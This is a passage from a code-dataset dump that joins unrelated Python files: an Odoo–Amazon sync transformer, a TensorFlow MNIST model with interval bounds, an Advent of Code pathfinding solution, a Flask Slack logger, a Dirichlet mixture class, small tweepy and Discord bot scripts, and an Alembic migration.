None\n\n @staticmethod\n def _raise_exception(field_name):\n template = \"Invalid {} value in Sync transformation\"\n raise ValueError(template.format(field_name))\n\n @staticmethod\n def _check_string(sync_value, field_name, field_value):\n # add field to sync value, raise an exception if the value is invalid\n if field_value:\n field_value = field_value.strip()\n if field_value:\n sync_value[field_name] = field_value\n return\n\n # otherwise raise an exception for required field\n BaseTransformer._raise_exception(field_name)\n\n @staticmethod\n def _add_string(sync_value, field_name, field_value):\n # add valid field value to sync value\n if field_value:\n field_value = field_value.strip()\n if field_value:\n sync_value[field_name] = field_value\n\n @staticmethod\n def _remove_syncs(sync_ops, removing_ops):\n for sync_op in removing_ops:\n sync_ops = sync_ops - sync_op\n return sync_ops\n\n def _merge_others(self, sync_op, sync_ops):\n \"\"\"\n This is stub that to be implement in a child class if\n it needs to do other work\n \"\"\"\n pass\n\n # the default implementation, update transform should combine values\n def _check_redundant(self, sync_ops):\n _logger.debug(\"check and remove redundant syncs.\")\n processed = set()\n redundant = []\n for sync_op in sync_ops:\n sync_key = (sync_op[MODEL_NAME_FIELD], sync_op[RECORD_ID_FIELD])\n if sync_key in processed:\n self._product_sync.set_sync_redundant(sync_op)\n redundant.append(sync_op)\n else:\n processed.add(sync_key)\n # a hook method that might be implemented in a subclass\n self._merge_others(sync_op, sync_ops)\n\n _logger.debug(\"Found {} redundant syncs.\".format(len(redundant)))\n return BaseTransformer._remove_syncs(sync_ops, redundant)\n\n def _convert_sync(self, sync_op):\n \"\"\"\n To be called and extended in subclass to convert more fields\n \"\"\"\n sync_value = {AMAZON_ID_FIELD: sync_op.id}\n sku = OdooProductAccess.get_sku(self._product)\n BaseTransformer._check_string(sync_value, AMAZON_SKU_FIELD, sku)\n return sync_value\n\n def _check_stop(self, sync_op):\n stop_sync = False\n self._product = self._odoo_product.get_existed_product(sync_op)\n # for all but delete, we want to make sure the product exists\n # no need to check Amazon Product table because both\n # waiting syncs are checked before switch to new\n if sync_op[SYNC_TYPE_FIELD] != SYNC_DELETE:\n if self._product:\n if self._odoo_product.is_sync_active_product(\n self._product):\n # may be unnecessary but does not hurt\n if sync_op[SYNC_TYPE_FIELD] == SYNC_DEACTIVATE:\n stop_sync = True\n else:\n if sync_op[SYNC_TYPE_FIELD] != SYNC_DEACTIVATE:\n stop_sync = True\n\n else:\n stop_sync = True\n return stop_sync\n\n def _transform_sync(self, sync_op, invalid_ops, sync_values):\n if self._check_stop(sync_op):\n log_template = \"Product not found or sync disabled \" \\\n \"for sync id {0}. Skip it.\"\n _logger.debug(log_template.format(sync_op.id))\n ProductSyncAccess.set_sync_no_product(sync_op)\n invalid_ops.append(sync_op)\n else:\n sync_value = self._convert_sync(sync_op)\n if sync_value:\n sync_values.append(sync_value)\n else:\n log_template = \"Sync id {0} has empty value. 
Skip it.\"\n _logger.debug(log_template.format(sync_op.id))\n ProductSyncAccess.update_sync_new_empty_value(sync_op)\n invalid_ops.append(sync_op)\n\n def transform(self, sync_ops):\n # we change sync_ops record set because making a copy\n # creates a new record set that is saved in table.\n sync_ops = self._check_redundant(sync_ops)\n\n sync_values = []\n invalid_ops = []\n for sync_op in sync_ops:\n try:\n self._transform_sync(sync_op, invalid_ops, sync_values)\n # some pending write syncs or newly-switched new\n # write syncs are made redundant by delete and create\n if sync_op[SYNC_TYPE_FIELD] in [SYNC_CREATE, SYNC_DELETE]:\n self._product_sync.find_set_redundant(sync_op)\n except Exception as ex:\n log_template = \"Sync transform error for sync id {0} \" \\\n \"Exception: {1}.\"\n _logger.debug(log_template.format(sync_op.id, ex.message))\n\n ProductSyncAccess.update_sync_new_exception(sync_op, ex)\n invalid_ops.append(sync_op)\n\n sync_ops = BaseTransformer._remove_syncs(sync_ops, invalid_ops)\n\n assert(len(sync_ops) == len(sync_values))\n return sync_ops, sync_values\n","repo_name":"amdeb/amdeb-amazon","sub_path":"amdeb_amazon/mws/product_sync_transform/base_transfomer.py","file_name":"base_transfomer.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"7466506917","text":"\"\"\"\nThe model is adapted from the tensorflow tutorial:\nhttps://www.tensorflow.org/get_started/mnist/pros\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\n\nclass Model(object):\n def __init__(self, config, c1_ops, c2_ops, fc_ops):\n filters = config[\"filters\"]\n filter_size = config[\"filter_size\"]\n\n self.x_input = tf.placeholder(tf.float32, shape = [None, 784])\n self.y_input = tf.placeholder(tf.int64, shape = [None])\n self.x_input_natural = tf.placeholder(tf.float32, shape = [None, 784])\n self.x_input_natural_reshaped = tf.reshape(self.x_input_natural, [-1, 28, 28, 1])\n self.x_image = tf.reshape(self.x_input, [-1, 28, 28, 1])\n\n # first convolutional layer\n self.W_conv1 = self._weight_variable([filter_size, filter_size, 1, filters[0]],\n sparsity = config[\"sparse_init\"])\n b_conv1 = self._bias_variable([filters[0]])\n self.h_1 = self._conv2d_2x2_strided(self.x_image, self.W_conv1) + b_conv1\n self.h_conv1 = self.get_anti_relu_layer(self.h_1, c1_ops)\n\n # second convolutional layer\n self.W_conv2 = self._weight_variable([filter_size, filter_size, filters[0], filters[1]],\n sparsity = config[\"sparse_init\"])\n b_conv2 = self._bias_variable([filters[1]])\n self.h_2 = self._conv2d_2x2_strided(self.h_conv1, self.W_conv2) + b_conv2\n self.h_conv2 = self.get_anti_relu_layer(self.h_2, c2_ops)\n\n # first fc layer\n self.W_fc1 = self._weight_variable([7 * 7 * filters[1], filters[2]])\n b_fc1 = self._bias_variable([filters[2]])\n h_conv2_flat = tf.reshape(self.h_conv2, [-1, 7 * 7 * filters[1]])\n self.h_fc_pre_relu = tf.matmul(h_conv2_flat, self.W_fc1) + b_fc1\n self.h_fc1 = self.get_anti_relu_layer(self.h_fc_pre_relu, fc_ops)\n\n # relu lb/ub estimation for layer 0\n self.lb_0 = tf.maximum(self.x_input_natural_reshaped - config[\"eval_epsilon\"], 0)\n self.ub_0 = tf.minimum(self.x_input_natural_reshaped + config[\"eval_epsilon\"], 1)\n\n # relu lb/ub estimation for layer 1\n self.lb_1, self.ub_1 = self._interval_arithmetic_conv_2x2_strided(self.lb_0, self.ub_0, self.W_conv1, 
b_conv1)\n self.lbh_1, self.ubh_1 = self.get_anti_relu_layer(self.lb_1, c1_ops), self.get_anti_relu_layer(self.ub_1, c1_ops)\n\n # relu lb/ub estimation for layer 2\n self.lb_2, self.ub_2 = self._interval_arithmetic_conv_2x2_strided(self.lbh_1, self.ubh_1, self.W_conv2, b_conv2)\n self.lbh_2, self.ubh_2 = self.get_anti_relu_layer(self.lb_2, c2_ops), self.get_anti_relu_layer(self.ub_2, c2_ops)\n self.lbh_2_flat = tf.reshape(self.lbh_2, [-1, 7 * 7 * filters[1]])\n self.ubh_2_flat = tf.reshape(self.ubh_2, [-1, 7 * 7 * filters[1]])\n\n # relu lb/ub estimation for layer 3\n self.lb_3, self.ub_3 = self._interval_arithmetic(self.lbh_2_flat, self.ubh_2_flat, self.W_fc1, b_fc1)\n\n # unstable relus estimation\n self.unstable1 = self._num_unstable(self.lb_1, self.ub_1, c1_ops)\n self.unstable2 = self._num_unstable(self.lb_2, self.ub_2, c2_ops)\n self.unstable3 = self._num_unstable(self.lb_3, self.ub_3, fc_ops)\n\n # output layer\n self.W_fc_out = self._weight_variable([filters[2],10])\n b_fc_out = self._bias_variable([10])\n self.pre_softmax = tf.matmul(self.h_fc1, self.W_fc_out) + b_fc_out\n y_xent = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.y_input, logits=self.pre_softmax)\n\n # xent loss\n self.xent = tf.reduce_mean(y_xent)\n\n # Final prediction\n self.y_pred = tf.argmax(self.pre_softmax, 1)\n correct_prediction = tf.equal(self.y_pred, self.y_input)\n self.num_correct = tf.reduce_sum(tf.cast(correct_prediction, tf.int64))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n # Assumes shapes of Bxm, Bxm, mxn, n\n def _interval_arithmetic(self, lb, ub, W, b):\n W_max = tf.maximum(W, 0.0)\n W_min = tf.minimum(W, 0.0)\n new_lb = tf.matmul(lb, W_max) + tf.matmul(ub, W_min) + b\n new_ub = tf.matmul(ub, W_max) + tf.matmul(lb, W_min) + b\n return new_lb, new_ub\n\n def _interval_arithmetic_conv_2x2_strided(self, lb, ub, W, b):\n W_max = tf.maximum(W, 0.0)\n W_min = tf.minimum(W, 0.0)\n new_lb = self._conv2d_2x2_strided(lb, W_max) + self._conv2d_2x2_strided(ub, W_min) + b\n new_ub = self._conv2d_2x2_strided(ub, W_max) + self._conv2d_2x2_strided(lb, W_min) + b\n return new_lb, new_ub\n\n @staticmethod\n def _weight_variable(shape, sparsity=-1.0):\n initial = tf.truncated_normal(shape, stddev=0.1)\n if sparsity > 0:\n mask = tf.cast(tf.random_uniform(shape) < sparsity, tf.float32)\n initial *= mask\n return tf.Variable(initial)\n\n @staticmethod\n def _bias_variable(shape):\n initial = tf.constant(0.1, shape = shape)\n return tf.Variable(initial)\n\n @staticmethod\n def _conv2d_2x2_strided(x, W):\n return tf.nn.conv2d(x, W, strides=[1,2,2,1], padding='SAME')\n\n \"\"\"Count number of unstable ReLUs\"\"\"\n @staticmethod\n def _num_unstable(lb, ub, ops=None):\n is_unstable = tf.cast(lb * ub < 0.0, tf.int32)\n if ops is not None:\n is_relu = (ops == 0)\n is_unstable_relu = is_relu * is_unstable\n else:\n is_unstable_relu = is_unstable\n all_but_first_dim = np.arange(len(is_unstable_relu.shape))[1:]\n result = tf.reduce_sum(is_unstable_relu, all_but_first_dim)\n return result\n\n def get_anti_relu_layer(self, activations, ops):\n assert (activations.shape[1:] == ops.shape)\n \n # Hacky solution because tensorflow is hard\n shape = activations.shape.as_list()\n shape[0] = -1\n num_elements = np.prod(shape[1:])\n flat_shape = [-1, num_elements]\n flat_activations = tf.reshape(activations, flat_shape)\n flat_ops = ops.flatten()\n flat_output = [0 for i in range(num_elements)]\n\n for i in range(num_elements):\n op = flat_ops[i]\n if op == -1:\n flat_output[i] = 0 * 
flat_activations[:,i]\n elif op == 1:\n flat_output[i] = flat_activations[:,i]\n elif op == 0:\n flat_output[i] = tf.nn.relu(flat_activations[:,i])\n else:\n raise ValueError(\"Ops should be -1, 1, or 0, but it is not\")\n\n # Transpose is necessary for batch size > 1\n output = tf.reshape(tf.transpose(flat_output), shape)\n return output\n","repo_name":"MadryLab/relu_stable","sub_path":"models/MNIST_naive_ia_masked.py","file_name":"MNIST_naive_ia_masked.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"18"} +{"seq_id":"11391779053","text":"from dataclasses import dataclass, field\nfrom queue import PriorityQueue\nfrom typing import Any\n\nfile = open('in.txt', 'r')\nlines = [line.strip() for line in file.readlines()]\n\nheight = len(lines)\nwidth = len(lines[0])\n\nheight_map = [-1 for _ in range(height * width)]\nend = None\n\n\ndef to_norm_coord(x, y):\n return y * width + x\n\n\n# init height map\nfor y in range(height):\n for x in range(width):\n char = lines[y][x]\n norm_coord = to_norm_coord(x, y)\n if char == 'S':\n height_map[norm_coord] = 0\n elif char == 'E':\n end = norm_coord\n height_map[norm_coord] = 25\n else:\n height_map[norm_coord] = ord(char) - 97\n\n# create adjacency list\nadj_list = [[] for _ in range(height * width)]\nfor y in range(height):\n for x in range(width):\n norm_coord = to_norm_coord(x, y)\n neighbors = [(x, y + 1), (x + 1, y), (x, y - 1), (x - 1, y)]\n neighbors = [to_norm_coord(x, y) for x, y in neighbors if 0 <= x < width and 0 <= y < height]\n for neighbor in neighbors:\n if height_map[neighbor] <= height_map[norm_coord] + 1:\n adj_list[norm_coord].append(neighbor)\n\n# init start vertices\nstart_vertices = [idx for idx in range(width * height) if height_map[idx] == 0]\n\n# calc min dist to end for every start vertex and save lowest of all\nmin_end_dist = float('inf')\n\n\n@dataclass(order=True)\nclass PrioritizedItem:\n priority: int\n item: Any = field(compare=False)\n\n\nfor start in start_vertices:\n # dijkstra\n dist = [float('inf') for _ in range(height * width)]\n dist[start] = 0\n queue = PriorityQueue()\n queue.put(PrioritizedItem(dist[start], start))\n\n while not queue.empty():\n item = queue.get()\n cur_dist = item.priority\n vertex = item.item\n if cur_dist > dist[vertex]:\n continue\n for neighbor in adj_list[vertex]:\n if cur_dist + 1 < dist[neighbor]:\n dist[neighbor] = cur_dist + 1\n queue.put(PrioritizedItem(cur_dist + 1, neighbor))\n min_end_dist = min(min_end_dist, dist[end])\n\nprint(min_end_dist)\n","repo_name":"ncryptedV1/AoC22","sub_path":"day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15782494061","text":"import gevent\nimport json\n\nfrom flask import request, render_template, abort\n\nfrom slacklog import app, messages, redis_store, sockets, backend\nfrom slacklog.models import Message\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", messages=messages)\n\n@app.route(\"/input\", methods=[\"POST\"])\ndef input_slack_message():\n msg = Message(timestamp=request.form['timestamp'],\n service_id=request.form['service_id'],\n channel_id=request.form['channel_id'],\n team_domain=request.form['team_domain'],\n text=request.form['text'],\n token=request.form['token'],\n user_name=request.form['user_name'],\n team_id=request.form['team_id'],\n user_id=request.form['user_id'],\n 
channel_name=request.form['channel_name'])\n if msg.token == app.config['SLACK_INPUT_TOKEN']:\n msg.process()\n messages.append(msg)\n redis_store.publish(app.config['REDIS_CHAN'], json.dumps(msg.__dict__))\n return \"ok\"\n else:\n abort(403)\n\n@sockets.route('/ws')\ndef ws_endpoint(ws):\n backend.register(ws)\n\n while not ws.closed:\n gevent.sleep(1)","repo_name":"hreeder/slacklog","sub_path":"slacklog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14206659610","text":"import sys\nsys.stdin = open('input.txt')\n\nnum = int(input())\nN = int(input())\narr = [[0] * (num+1) for _ in range(num+1)]\n\nfor _ in range(N):\n i, j = map(int, input().split())\n arr[i][j] = arr[j][i] = 1\n\nworm = [1]\nchecked = [1]\n\nwhile worm:\n i = worm.pop()\n\n for j in range(1, num + 1):\n if arr[i][j] == 1 and (j not in checked):\n worm.append(j)\n checked.append(j)\n\nprint(len(checked)-1)\n\n\n\n\n\n","repo_name":"yujeong23/algorithm","sub_path":"백준/silver/2606_바이러스/2606_바이러스.py","file_name":"2606_바이러스.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40985321783","text":"from string import split, join, strip\nimport sys, os, copy\nfrom transcendental import gamma, log, array, product, beta, lgamma, exp, zeros\nfrom Bio.Align.AlignInfo import PSSM\nfrom cStringIO import StringIO\n\n# Background amino acid frequencies - as dictionary\n## BKGRND_PROBS = {'A': 7.5610, 'C': 1.6504, 'D': 5.0605,\n## 'E': 6.1824, 'F': 4.0928, 'G': 6.9696,\n## 'H': 2.2818, 'I': 5.7749, 'K': 5.6397,\n## 'L': 9.5874, 'M': 2.3668, 'N': 4.3354,\n## 'P': 5.0832, 'Q': 3.9400, 'R': 5.3245,\n## 'S': 7.3014, 'T': 5.7451, 'V': 6.5107,\n## 'W': 1.3716, 'Y': 3.1464}\n\nBKGRND_PROBS = {'A': 0.075666295724018673, 'C': 0.016516288118360062,\n 'E': 0.061870031303289649, 'D': 0.050642678152545494,\n 'G': 0.069747892431969383, 'F': 0.040958473103989368,\n 'I': 0.05779199724595098, 'H': 0.022834989231988598,\n 'K': 0.056438990609013105, 'M': 0.023685622102844514,\n 'L': 0.095945383365223735, 'N': 0.043386279391867545,\n 'Q': 0.039429335425556614, 'P': 0.050869847166291719,\n 'S': 0.073068362861969299, 'R': 0.053284643774968568,\n 'T': 0.057493775368874442, 'W': 0.013726212301952652,\n 'V': 0.065155475673901384, 'Y': 0.031487426645424192}\n\ndef _print_vector(v, indent=0, floats_per_row=10, fp=sys.stdout,\n indent_first_row=True):\n if indent_first_row: indent1 = indent\n else: indent1 = 0\n fp.write(\"%*s[\" % (indent1, \"\"))\n k = range(len(v))\n for i in range(0, len(v), floats_per_row):\n for j in k[i: i+floats_per_row]:\n fp.write(\"%.7f, \" % v[j])\n fp.write(\"\\n%*s\" % (indent+1, \"\"))\n fp.write(\"]\")\n\ndef freq_counts(seqs, alphabet, weights=None):\n if weights == None: weights = [1.0]*len(seqs)\n counts = [[0.0 for a in alphabet] for s in seqs[0]]\n order = {}\n for i, a in enumerate(alphabet):\n order[a] = i\n\n for i in range(len(seqs[0])):\n for j in range(len(seqs)):\n a = order[seqs[j][i]]\n counts[i][a] += weights[j]\n return counts\n\ndef henikoff_weights(seqs, alphabet, counts):\n order = {}\n for i, a in enumerate(alphabet):\n order[a] = i\n weights = [0.0]*len(seqs)\n w_sum = 0.0\n for i in range(len(counts)):\n r = 0\n for j in range(len(counts[i])):\n if counts[i][j] > 0.0: r += 1\n for k in range(len(seqs)):\n w = 1 / (r * counts[i][order[seqs[k][i]]])\n weights[k] += w\n w_sum 
+= w\n c = len(seqs) / w_sum\n return [w*c for w in weights]\n\n\ndef log_beta(x):\n return sum(lgamma(x)) - lgamma(sum(x))\n\nclass DirichletMix:\n def __init__(self, dic=None):\n if dic == None:\n self.mixture = []\n self.alpha = []\n self.order = {}\n else:\n self.__dict__.update(dic)\n self.order = {}\n for i, a in enumerate(self.alphabet):\n self.order[a] = i\n self.num_distr = len(self.mixture)\n \n def read(self, filename):\n fp = file(filename, 'r')\n actions = {'Name': \"self.name = atoms[2]\",\n 'Name=': \"self.name = atoms[1]\",\n 'Order': \"self.alphabet = join(atoms[2:],'')\",\n 'Order=': \"self.alphabet = join(atoms[1:],'')\",\n 'Mixture=': \"self.mixture.append(float(atoms[1]))\",\n 'Alpha=': \"self.alpha.append(map(float, atoms[1:]))\",\n }\n\n for line in fp:\n atoms = split(strip(line))\n if not len(atoms): continue\n if atoms[0] == 'EndClassName': break\n if atoms[0] not in actions: continue\n else:\n exec(actions[atoms[0]])\n fp.close()\n for i, a in enumerate(self.alphabet):\n self.order[a] = i\n self.num_distr = len(self.mixture)\n\n def _print_as_PyDict(self, indent=0, floats_per_row=10, fp=sys.stdout,\n indent_first_row=True):\n if indent_first_row: indent1 = indent\n else: indent1 = 0\n fp.write(\"%*s{'name': '%s',\\n\" % (indent1, \"\", self.name))\n fp.write(\"%*s 'alphabet': '%s',\\n\" % (indent, \"\", self.alphabet))\n fp.write(\"%*s 'mixture': \" % (indent, \"\"))\n _print_vector(self.mixture, indent+12, floats_per_row, fp, False)\n fp.write(\",\\n\")\n fp.write(\"%*s 'alpha': [\" % (indent, \"\"))\n _print_vector(self.alpha[0], indent+11, floats_per_row, fp, False)\n fp.write(\",\\n\")\n for i in range(1,len(self.alpha)):\n _print_vector(self.alpha[i], indent+11, floats_per_row, fp, True)\n fp.write(\",\\n\")\n fp.write(\"%*s ]}\" % (indent, \"\"))\n\n # TO DO: FIX THE NOTATION SO THAT IT CORRESPONDS TO THE PAPER\n\n def _coeffs(self, k, n, sum_n):\n alpha = array(self.alpha[k][1:])\n sum_alpha = self.alpha[k][0]\n q = self.mixture[k]\n\n # Calculate the coefficient using logarithms\n log_coeff = log_beta(n+alpha) - log_beta(alpha)\n return q * exp(log_coeff)\n \n## P = 1.0\n## for i in range(len(alpha)):\n## if n[i]:\n## P *= n[i] * beta(n[i], alpha[i])\n## print n[i], alpha[i], beta(n[i], alpha[i])\n## print P\n## B = sum_n * beta(sum_n, sum_alpha)\n## return q * B / P\n\n def _probs(self, i, coeff, n):\n a = array([self.alpha[k][i+1] for k in xrange(self.num_distr)])\n sum_a_j = array([sum(self.alpha[k][1:]) for k in xrange(self.num_distr)])\n return sum(coeff*(a+n[i])/(sum_a_j + sum(n)))\n\n def aa_vector(self, aa_dict):\n return [aa_dict[a] for a in self.alphabet]\n\n def block_counts(self, seqs, weights=None):\n return freq_counts(seqs, self.alphabet, weights)\n\n \n def _pos_probs(self, counts):\n n = array(counts)\n\n # *** NEW CODE FROM HERE ****\n sum_n = sum(n)\n p = array([0.0]*len(counts))\n log_coeffs = array([0.0]*self.num_distr)\n q = array(self.mixture)\n\n for j in xrange(self.num_distr):\n alpha_j = array(self.alpha[j][1:])\n log_coeffs[j] = log_beta(n+alpha_j) - log_beta(alpha_j)\n \n log_coeffs = log_coeffs - max(log_coeffs)\n coeffs = q * exp(log_coeffs)\n\n for i in xrange(len(counts)):\n a = array([self.alpha[j][i+1] for j in xrange(self.num_distr)])\n sum_a_j = array([sum(self.alpha[j][1:]) for j in xrange(self.num_distr)])\n N = (a+n[i])/(sum_a_j + sum(n))\n p[i] = sum(coeffs*N)\n\n return p / sum(p) \n # **** END OF NEW CODE **** \n\n## coeff = array([self._coeffs(k, n, sum(n)) for k in range(self.num_distr)])\n## # coeff = coeff / 
sum(coeff)\n## X = array([self._probs(i, coeff, n) for i in xrange(len(counts))])\n## return X / sum(X)\n\n def _pos_log_odds(self, _pos_probs, bkgrnd, scale=1.0):\n n = len(_pos_probs)\n return [int(scale * log(_pos_probs[i]/bkgrnd[i]) / log(2.0)) for i in range(n)]\n\n def block_probs(self, block_counts):\n return [self._pos_probs(counts) for counts in block_counts]\n\n def block_log_odds(self, block_probs, bkgrnd, scale=1.0):\n return [self._pos_log_odds(probs, bkgrnd, scale) for probs in block_probs]\n \n def block2pssm(self, block_data, seq):\n pssm_info = []\n for i in range(len(block_data)):\n score_dict = {}\n for a in self.alphabet:\n score_dict[a] = block_data[i][self.order[a]]\n pssm_info.append((seq[i], score_dict))\n return PSSM(pssm_info)\n\n def print_block_data(self, block_data, field_width=4, precision=4, dtype='int'):\n file_str = StringIO()\n if dtype == 'int':\n pdata = lambda x: \"%*d \" % (field_width, x)\n else:\n pdata = lambda x: \"%*.*f \" % (field_width, precision, x)\n \n file_str.write(\" \")\n for i in range(len(block_data)):\n file_str.write(\"%*d \" % (field_width, i))\n file_str.write(\"\\n\")\n for j, a in enumerate(self.alphabet):\n file_str.write(\" %c \" % a)\n for i in range(len(block_data)):\n file_str.write(pdata(block_data[i][j]))\n file_str.write(\"\\n\")\n return file_str.getvalue()\n \ndef _Comp2PyScript(path, filename=None):\n \"\"\"\n Converts all Dirichlet mixtures files (ending in comp)\n in the path to Python dictionaries and stores them\n in filename if provided (otherwise prints to stdout).\n \"\"\"\n\n if filename == None:\n fp = sys.stdout\n else:\n fp = file(filename, 'w')\n\n names = os.listdir(path)\n ffunc = lambda s: s[-4:] == 'comp'\n names = filter(ffunc ,names)\n names.sort()\n\n fp.write(\"import DirichletMix\\n\\n\")\n fp.write(\"get_mix = lambda name: DirichletMix.DirichletMix(DIR_MIX[name])\\n\") \n fp.write(\"get_names = lambda : NAMES\\n\\n\")\n\n k = range(len(names))\n fp.write(\"NAMES = [\")\n for i in range(0, len(k), 3):\n for j in k[i: i+3]:\n fp.write(\"'%s', \" % names[j])\n fp.write(\"\\n%*s\" % (9+1, \"\"))\n fp.write(\"]\\n\\n\")\n \n fp.write(\"DIR_MIX = {\\n\")\n fp.write(\" '%s': \" % names[0])\n DM = DirichletMix()\n DM.read(names[0])\n DM._print_as_PyDict(4+len(names[0])+4, 4, fp, False)\n fp.write(\",\\n\")\n \n for s in names[1:]:\n fp.write(\"%*s'%s': \" % (4, \"\", s))\n DM = DirichletMix()\n DM.read(s)\n DM._print_as_PyDict(4+len(s)+4, 4, fp, False) \n fp.write(\",\\n\")\n fp.write(\" }\\n\")\n \n if filename != None:\n fp.close()\n\n","repo_name":"samesense/bio_tools","sub_path":"DirichletMix.py","file_name":"DirichletMix.py","file_ext":"py","file_size_in_byte":9779,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"24861868143","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 2 09:02:25 2021\n\n@author: ritu\n\"\"\"\n\n\nimport tweepy\nimport pandas as pd\n\n \n# assign the values accordingly\n#consumer_key = \"\"\n#consumer_secret = \"\"\n#access_token = \"\"\n#access_token_secret = \"\"\n\nconsumer_key = \"\"\nconsumer_secret = \"\"\naccess_token = \"\"\naccess_token_secret = \"\"\n \n# authorization of consumer key and consumer secret\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n \n# set access to user's access key and access secret \nauth.set_access_token(access_token, access_token_secret)\n \n# calling the api \napi = tweepy.API(auth, wait_on_rate_limit=True)\n \n# the ID of the tweet\nID 
= 1265889240300257280\n#ID = 1272479136133627905\n\nID = 1455236401071484929\n# \n# getting the retweeters\nretweets_list = api.retweets(ID)\nstatus= api.get_status(ID)\n#file= 'sample status.txt'\nfile = open(\"sample status.txt\", \"w\")\nfile.write(str(status))\n#print(status)\n#print(retweets_list)\n# printing the screen names of the retweeters\nfor retweet in retweets_list:\n print(retweet.user.screen_name)\n","repo_name":"saurabhburewar/Data-and-Networks_Hashtag-analysis","sub_path":"Twitter files/retweeter.py","file_name":"retweeter.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28331276643","text":"#!/usr/bin/python\n\nimport csv\nfrom ingredients import *\n\n\n# class Recipe:\n# '''recipes available in the cookbooks'''\n# def __init__(self, name, resource, carrots, onions, celeries, \\\n# peppers, garlics, ):\n# self.name = name\n# self.ingredients = OrderedDict([(carrot,carrots), \\\n# (onion,onions), (celery,celeries), (pepper,peppers), \\\n# (garlic,garlics), )])\n# \n# def __hash__(self):\n# return hash(self.name)\n# \n# def __str__(self):\n# return 'Supply(\"%s\", %d, %d, %d, %d, %d, %d)' % (self.name, self.ingredients[carrot], self.ingredients[onion], self.ingredients[celery], self.ingredients[pepper], self.ingredients[garlic], self.ingredients[herbs])\n# \n# def publish(self):\n# '''prints name of Supply and how many of each item'''\n# print(self.name)\n# for (k,v) in self.ingredients.items():\n# print(k.name,v,sep='\\t')\n# \n# def display(self):\n# '''prepares string of market status'''\n# status = str()\n# for (k,v) in self.ingredients.items():\n# status+=k.name+': '+str(v)+' '\n# return(status)\n# \n# def quantity(self):\n# '''finds how many Ingredients are in Supply'''\n# return( sum([v for v in self.ingredients.values()]) )\n\n\n\nfilename = 'recipes.csv'\n\ncookbooks = [list() for n in range(3)]\n\nwith open(filename, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter = ',')\n next(reader) # to skip the header row\n for row in reader:\n cookbooks[int(row[-1])-1].append(row)\n# cookbooks[int(row[int('level')])-1].append(row)\n","repo_name":"jcpinyan/simmer","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5408804962","text":"# pip install nextcord\nimport nextcord\nfrom nextcord.ext import commands\nimport os\nimport time\n\n\nprint(\"MUST HAVE TURNED ALL THE INTENTS ON IN THE BOT SETTINGS\")\ntime.sleep(1)\nprint(\"To do that go to : https://discord.com/developers/applications/\")\nintents = nextcord.Intents.all()\nintents.members = True\n\ntoken = input(\"What's your bot's token? [You can check our code that we **DO NOT** store discord bot token] : \")\nprefix = input(\"Bot prefix? : \")\nbot_status = input(\"What should be the bot's status? : \")\nprint(\"After the bot is online, do the command, prefixdo_that, [EG: !do_that, $do_that]\")\n\nclient = commands.Bot(command_prefix=prefix, intents=intents)\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n print(\"Your bot is online\")\n await client.change_presence(activity=nextcord.Game(name=bot_status))\n\n@client.command()\nasync def send_message(ctx):\n message = input(\"What's the message that you want to send? 
: \")\n await ctx.send(message)\n\ntoken = open(\"TOKEN\", \"r\").read()\nclient.run(token)\n","repo_name":"RomeandAlphaGuylol/ChatFromDiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11926677557","text":"\"\"\"bd softwares timestamp\n\nRevision ID: 3251458bf6f0\nRevises: 4ae782f1bed5\nCreate Date: 2020-03-23 21:47:46.412140\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3251458bf6f0'\ndown_revision = '4ae782f1bed5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('softwares', sa.Column('timestamp', sa.DateTime(), nullable=True))\n op.create_index(op.f('ix_softwares_timestamp'), 'softwares', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_softwares_timestamp'), table_name='softwares')\n op.drop_column('softwares', 'timestamp')\n # ### end Alembic commands ###\n","repo_name":"pbaesse/dados-livres","sub_path":"migrations/versions/3251458bf6f0_bd_softwares_timestamp.py","file_name":"3251458bf6f0_bd_softwares_timestamp.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"27589934234","text":"import pickle\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_val_score\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import 